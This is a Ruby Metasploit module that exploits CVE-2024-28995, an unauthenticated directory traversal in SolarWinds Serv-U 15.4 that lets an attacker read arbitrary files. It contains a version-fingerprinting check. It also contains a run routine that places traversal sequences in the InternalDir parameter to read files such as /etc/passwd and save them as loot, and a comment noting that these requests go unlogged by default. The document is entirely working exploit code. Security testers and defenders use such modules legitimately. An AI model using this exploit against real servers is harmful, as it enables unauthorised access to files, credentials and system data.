SolarWinds Serv-U Unauthenticated Arbitrary File Read

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'SolarWinds Serv-U Unauthenticated Arbitrary File Read',  
'Description' => %q{  
This module exploits an unauthenticated file read vulnerability, due to directory traversal, affecting  
SolarWinds Serv-U FTP Server 15.4, Serv-U Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to  
the vendor supplied hotfix "15.4.2 Hotfix 2" (version 15.4.2.157) are affected.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'sfewer-r7', # MSF Module & Rapid7 Analysis  
'Hussein Daher' # Original finder  
],  
'References' => [  
['CVE', '2024-28995'],  
['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995'],  
['URL', 'https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis']  
],  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
# There are no side effects I could determine. By default there is no logging enabled by Serv-U, and in  
# testing I was not able to enable logging such that any of the exploits requests were actually logged. If  
# a reverse proxy/gateway is in place that will likely be able to log attacker requests, but that is not a  
# default setup.  
'SideEffects' => [],  
'Reliability' => []  
}  
)  
)  
  
register_options(  
[  
OptBool.new('STORE_LOOT', [false, 'Store the target file as loot', true]),  
OptString.new('TARGETURI', [true, 'The base URI path to the web application', '/']),  
OptString.new('TARGETFILE', [true, 'The full path of a target file to read.', '/etc/passwd']),  
OptInt.new('PATH_TRAVERSAL_COUNT', [true, 'The number of double dot (..) path segments needed to traverse to the root folder.', 4]),  
]  
)  
end  
  
def check  
# We try to leverage the vulnerability and read the file `Serv-U-StartupLog.txt` from the default location in  
# a default install on both Linux and Windows. If successful, we can pull out the Serv-U version number and the  
# OS version. By default, the location of the `Serv-U-StartupLog.txt` file is  
# `C:\ProgramData\RhinoSoft\Serv-U\Serv-U-StartupLog.txt` on Windows, and `/usr/local/Serv-U/Serv-U-StartupLog.txt`  
# on Linux.  
default_paths = [  
'\\..',  
'/../../../../ProgramData/RhinoSoft/Serv-U'  
]  
  
default_paths.each do |default_path|  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(datastore['TARGETURI']),  
'vars_get' => {  
'InternalDir' => default_path,  
'InternalFile' => 'Serv-U-StartupLog.txt'  
}  
)  
  
return Msf::Exploit::CheckCode::Unknown('Connection failed') unless res  
  
next unless res.code == 200  
  
version = res.body.match(/Serv-U.+Version.+\(([\d+.]{1,})\)/)  
  
next unless version  
  
os = res.body.match(/Operating System:\s+(.+)/)  
  
return Msf::Exploit::CheckCode::Vulnerable("SolarWinds Serv-U version #{version[1]} (#{os.nil? ? 'Unknown OS' : os[1]})")  
end  
  
Msf::Exploit::CheckCode::Safe  
end  
  
def run  
if datastore['TARGETFILE'].start_with? '/'  
native_path_sep = '/'  
target_path_sep = '\\'  
target_filepath = datastore['TARGETFILE']  
elsif datastore['TARGETFILE'][1, 3] == ':\\\\'  
native_path_sep = '\\'  
target_path_sep = '/'  
target_filepath = datastore['TARGETFILE'][3..]  
else  
fail_with(Failure::BadConfig, 'Ensure the TARGETFILE path starts with / for a Linux target, and C:\\\\ for a Windows target.')  
end  
  
# On Windows, the default install directory is: C:\ProgramData\RhinoSoft\Serv-U\  
# On Linux, the default install directory is: /usr/local/Serv-U/  
# The Serv-U service, will read files from the Client directory, so /usr/local/Serv-U/Client/ on Linux  
# and C:\ProgramData\RhinoSoft\Serv-U\Client\ on Windows.  
# Therefore to leverage the directory traversal and navigate to the root folder on either platform will require  
# 4 double dot path segments.  
# We expose PATH_TRAVERSAL_COUNT to the user in case they are targeting a non default install location.  
path_traversal = "#{target_path_sep}.." * datastore['PATH_TRAVERSAL_COUNT']  
  
last_sep_pos = target_filepath.rindex(native_path_sep)  
  
fail_with(Failure::BadConfig, 'Could not locate a path separator in the TARGETFILE path') unless last_sep_pos  
  
if last_sep_pos == 0  
internal_dir = ''  
else  
internal_dir = target_filepath[0..last_sep_pos - 1].gsub(native_path_sep, target_path_sep)  
end  
  
internal_file = target_filepath[last_sep_pos + 1..]  
  
print_status("Reading file #{datastore['TARGETFILE']}")  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(datastore['TARGETURI']),  
'vars_get' => {  
'InternalDir' => path_traversal << internal_dir,  
'InternalFile' => internal_file  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'Connection failed') unless res  
  
fail_with(Failure::UnexpectedReply, "Unexpected response from server. HTTP code #{res.code}.") unless res.code == 200  
  
if datastore['STORE_LOOT']  
print_status('Storing the file data to loot...')  
  
store_loot(  
internal_file,  
res.body.ascii_only? ? 'text/plain' : 'application/octet-stream',  
datastore['RHOST'],  
res.body,  
datastore['TARGETFILE'],  
'File read from SolarWinds Serv-U server'  
)  
else  
print_line(res.body)  
end  
end  
  
end  
`